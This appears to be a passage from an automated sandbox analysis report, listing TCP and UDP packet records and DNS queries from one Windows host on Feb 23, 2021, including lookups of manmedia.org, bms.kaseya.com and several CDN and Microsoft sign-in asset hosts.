Feb 23, 2021 16:02:42.961394072 CET	49758	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:42.962002039 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:42.962033987 CET	49761	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:42.962093115 CET	49760	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.107979059 CET	443	49758	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.108074903 CET	49758	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.108577013 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.108642101 CET	443	49760	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.108668089 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.108683109 CET	443	49761	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.108700037 CET	49760	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.108745098 CET	49761	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.109178066 CET	49758	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.109468937 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.110058069 CET	49761	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.110120058 CET	49760	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.256957054 CET	443	49758	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.257026911 CET	443	49758	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.257039070 CET	443	49758	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.257173061 CET	49758	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.257237911 CET	49758	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.257884979 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.257908106 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.257920980 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.257958889 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.257985115 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.257988930 CET	443	49761	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.258008957 CET	443	49761	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.258021116 CET	443	49761	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.258050919 CET	49761	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.258090019 CET	49761	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.258816004 CET	443	49760	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.258837938 CET	443	49760	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.258855104 CET	443	49760	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.258903027 CET	49760	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.258953094 CET	49760	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.271112919 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.271724939 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.272063017 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.272238016 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.272401094 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.272555113 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.275650024 CET	49761	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.276242018 CET	49761	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.278301001 CET	49760	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.278873920 CET	49760	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.279836893 CET	49758	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.280443907 CET	49758	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.418168068 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.418704987 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.418917894 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.420707941 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.420730114 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.420891047 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.421864033 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.422610044 CET	443	49761	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.424568892 CET	443	49761	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.424587011 CET	443	49761	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.424930096 CET	49761	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.425251007 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.425277948 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.425301075 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.425327063 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.425348043 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.425353050 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.425369978 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.425411940 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.425415039 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.425438881 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.425461054 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.425462008 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.425482035 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.425491095 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.425499916 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.425508976 CET	443	49760	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.425528049 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.425543070 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.425543070 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.425596952 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.425621986 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.426008940 CET	49761	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.426775932 CET	443	49758	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.426789999 CET	443	49760	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.426891088 CET	49760	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.426989079 CET	443	49760	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.427050114 CET	49760	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.427767992 CET	49760	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.428565979 CET	443	49758	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.428577900 CET	443	49758	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.428675890 CET	49758	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.428711891 CET	49758	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.429471016 CET	49758	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.571517944 CET	443	49761	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.571640015 CET	49761	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.572038889 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572062969 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572078943 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572097063 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572117090 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572128057 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.572135925 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572154045 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572170973 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.572180986 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572199106 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572216988 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572233915 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572244883 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.572251081 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572252035 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.572268963 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572288990 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572293997 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.572307110 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572324991 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572338104 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.572339058 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572357893 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572376966 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572381020 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.572396040 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572407961 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.572412968 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572431087 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572433949 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.572448015 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.572462082 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.572509050 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.573833942 CET	443	49760	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.573930025 CET	49760	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.575026989 CET	443	49758	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.575145960 CET	49758	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.618868113 CET	443	49758	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.618891001 CET	443	49761	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.618902922 CET	443	49760	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.722069025 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.722099066 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.722115040 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.722134113 CET	443	49759	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:43.722278118 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:43.722312927 CET	49759	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:03:21.476064920 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:03:21.476099014 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:03:21.476115942 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:03:21.476231098 CET	49744	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:03:21.476262093 CET	49744	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:03:21.476716042 CET	49744	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:03:21.518552065 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:03:21.740577936 CET	443	49745	152.199.23.37	192.168.2.6
Feb 23, 2021 16:03:21.740788937 CET	49745	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:04:09.263701916 CET	49745	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:04:09.264894962 CET	49736	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:04:09.265238047 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:04:09.265312910 CET	49738	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:04:09.265393019 CET	49741	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:04:09.265412092 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:04:09.307071924 CET	443	49745	152.199.23.37	192.168.2.6
Feb 23, 2021 16:04:09.312907934 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:04:09.313437939 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:04:09.313462019 CET	443	49736	104.16.19.94	192.168.2.6
Feb 23, 2021 16:04:09.313555002 CET	49736	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:04:09.414184093 CET	443	49738	204.93.216.87	192.168.2.6
Feb 23, 2021 16:04:09.414222002 CET	443	49741	204.93.216.87	192.168.2.6
Feb 23, 2021 16:04:09.414233923 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:04:09.414318085 CET	49738	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:04:09.414343119 CET	49741	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:04:09.414345026 CET	49737	443	192.168.2.6	204.93.216.87

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 16:01:52.619389057 CET	62044	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:01:52.668191910 CET	53	62044	8.8.8.8	192.168.2.6
Feb 23, 2021 16:01:53.007054090 CET	63791	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:01:53.068615913 CET	53	63791	8.8.8.8	192.168.2.6
Feb 23, 2021 16:01:53.756910086 CET	64267	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:01:53.807135105 CET	53	64267	8.8.8.8	192.168.2.6
Feb 23, 2021 16:01:54.761374950 CET	49448	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:01:54.814598083 CET	53	49448	8.8.8.8	192.168.2.6
Feb 23, 2021 16:01:55.966543913 CET	60342	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:01:56.020889044 CET	53	60342	8.8.8.8	192.168.2.6
Feb 23, 2021 16:01:57.477029085 CET	61346	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:01:57.525707960 CET	53	61346	8.8.8.8	192.168.2.6
Feb 23, 2021 16:01:58.464972019 CET	51774	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:01:58.513637066 CET	53	51774	8.8.8.8	192.168.2.6
Feb 23, 2021 16:01:59.710099936 CET	56023	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:01:59.767611027 CET	53	56023	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:00.583790064 CET	58384	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:00.644685984 CET	53	58384	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:01.093095064 CET	60261	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:01.144609928 CET	53	60261	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:01.976259947 CET	56061	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:02.036315918 CET	53	56061	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:02.143903971 CET	58336	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:02.209268093 CET	53	58336	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:04.668682098 CET	53781	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:04.717261076 CET	53	53781	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:05.653724909 CET	54064	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:05.702496052 CET	53	54064	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:06.601361036 CET	52811	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:06.651658058 CET	53	52811	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:07.557215929 CET	55299	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:07.609883070 CET	53	55299	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:08.669234991 CET	63745	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:08.726890087 CET	53	63745	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:10.739449978 CET	50055	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:10.799523115 CET	53	50055	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:11.770328999 CET	61374	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:11.821803093 CET	53	61374	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:12.734819889 CET	50339	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:12.786484957 CET	53	50339	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:13.951509953 CET	63307	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:14.001426935 CET	53	63307	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:18.245417118 CET	49694	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:18.305520058 CET	53	49694	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:19.623764992 CET	54982	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:19.625435114 CET	50010	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:19.672889948 CET	63718	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:19.675731897 CET	53	50010	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:19.722986937 CET	53	63718	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:19.724246979 CET	62116	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:19.772965908 CET	53	62116	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:19.799175978 CET	63816	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:19.811990023 CET	53	54982	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:19.847739935 CET	53	63816	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:19.952163935 CET	55014	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:20.011754036 CET	53	55014	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:21.058018923 CET	62208	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:21.109530926 CET	53	62208	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:21.492175102 CET	57574	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:21.545072079 CET	53	57574	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:27.144164085 CET	51818	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:27.192840099 CET	53	51818	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:30.564531088 CET	56628	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:30.624289036 CET	53	56628	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:31.570382118 CET	56628	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:31.630390882 CET	53	56628	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:32.588417053 CET	56628	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:32.644265890 CET	53	56628	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:34.603355885 CET	56628	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:34.665745974 CET	53	56628	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:38.618885994 CET	56628	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:38.672883034 CET	53	56628	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:39.200639009 CET	60778	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:39.257771015 CET	53	60778	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:39.373820066 CET	53799	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:39.422380924 CET	53	53799	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:42.757272959 CET	54683	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:42.786381006 CET	59329	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:42.836890936 CET	53	59329	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:42.947171926 CET	53	54683	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:47.301731110 CET	64021	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:47.361794949 CET	53	64021	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:48.225008011 CET	56129	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:48.273657084 CET	53	56129	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:48.824106932 CET	58177	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:48.875699997 CET	53	58177	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:49.229999065 CET	56129	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:49.252506971 CET	50700	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:49.278628111 CET	53	56129	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:49.309638023 CET	53	50700	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:50.244508982 CET	56129	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:50.261003971 CET	50700	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:50.293301105 CET	53	56129	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:50.309602976 CET	53	50700	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:51.260147095 CET	50700	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:51.308711052 CET	53	50700	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:52.295689106 CET	56129	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:52.344383001 CET	53	56129	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:53.293883085 CET	50700	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:53.352950096 CET	53	50700	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:56.307324886 CET	56129	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:56.357923985 CET	53	56129	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:57.308763027 CET	50700	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:57.357343912 CET	53	50700	8.8.8.8	192.168.2.6
Feb 23, 2021 16:02:58.998047113 CET	54069	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:02:59.099615097 CET	53	54069	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:00.113002062 CET	61178	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:00.175487995 CET	53	61178	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:00.804245949 CET	57017	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:00.870345116 CET	53	57017	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:01.373361111 CET	56327	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:01.433697939 CET	53	56327	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:01.582216024 CET	50243	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:01.646534920 CET	53	50243	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:02.258481026 CET	62055	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:02.318363905 CET	53	62055	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:02.893904924 CET	61249	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:02.953095913 CET	53	61249	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:03.544648886 CET	65252	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:03.593317986 CET	53	65252	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:04.153687954 CET	64367	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:04.225543022 CET	53	64367	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:04.872262955 CET	55066	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:04.939877987 CET	53	55066	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:06.080887079 CET	60211	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:06.140974045 CET	53	60211	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:07.098139048 CET	56570	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:07.157731056 CET	53	56570	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:08.872299910 CET	58454	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:08.922627926 CET	53	58454	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:09.886121988 CET	58454	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:09.946911097 CET	53	58454	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:10.902343988 CET	58454	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:10.953257084 CET	53	58454	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:11.764092922 CET	55180	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:11.814476967 CET	53	55180	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:12.776983023 CET	55180	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:12.827263117 CET	53	55180	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:12.918086052 CET	58454	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:12.966739893 CET	53	58454	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:13.876075983 CET	55180	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:13.926209927 CET	53	55180	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:15.886631966 CET	55180	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:15.935420036 CET	53	55180	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:16.934031010 CET	58454	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:16.985090017 CET	53	58454	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:19.902928114 CET	55180	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:19.951489925 CET	53	55180	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:32.384936094 CET	58721	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:32.443727970 CET	53	58721	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:38.973121881 CET	57691	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:39.024638891 CET	53	57691	8.8.8.8	192.168.2.6
Feb 23, 2021 16:03:44.922283888 CET	52943	53	192.168.2.6	8.8.8.8
Feb 23, 2021 16:03:44.987657070 CET	53	52943	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 16:02:01.976259947 CET	192.168.2.6	8.8.8.8	0x4242	Standard query (0)	bms.kaseya.com	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:19.623764992 CET	192.168.2.6	8.8.8.8	0x80a7	Standard query (0)	manmedia.org	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:19.625435114 CET	192.168.2.6	8.8.8.8	0x20f	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:19.672889948 CET	192.168.2.6	8.8.8.8	0xcd77	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:19.724246979 CET	192.168.2.6	8.8.8.8	0x30e1	Standard query (0)	stackpath.bootstrapcdn.com	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:19.799175978 CET	192.168.2.6	8.8.8.8	0x837c	Standard query (0)	ajax.aspnetcdn.com	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:21.058018923 CET	192.168.2.6	8.8.8.8	0x478e	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:39.200639009 CET	192.168.2.6	8.8.8.8	0xe7c5	Standard query (0)	manmedia.org	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:42.757272959 CET	192.168.2.6	8.8.8.8	0xd1c0	Standard query (0)	manmedia.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
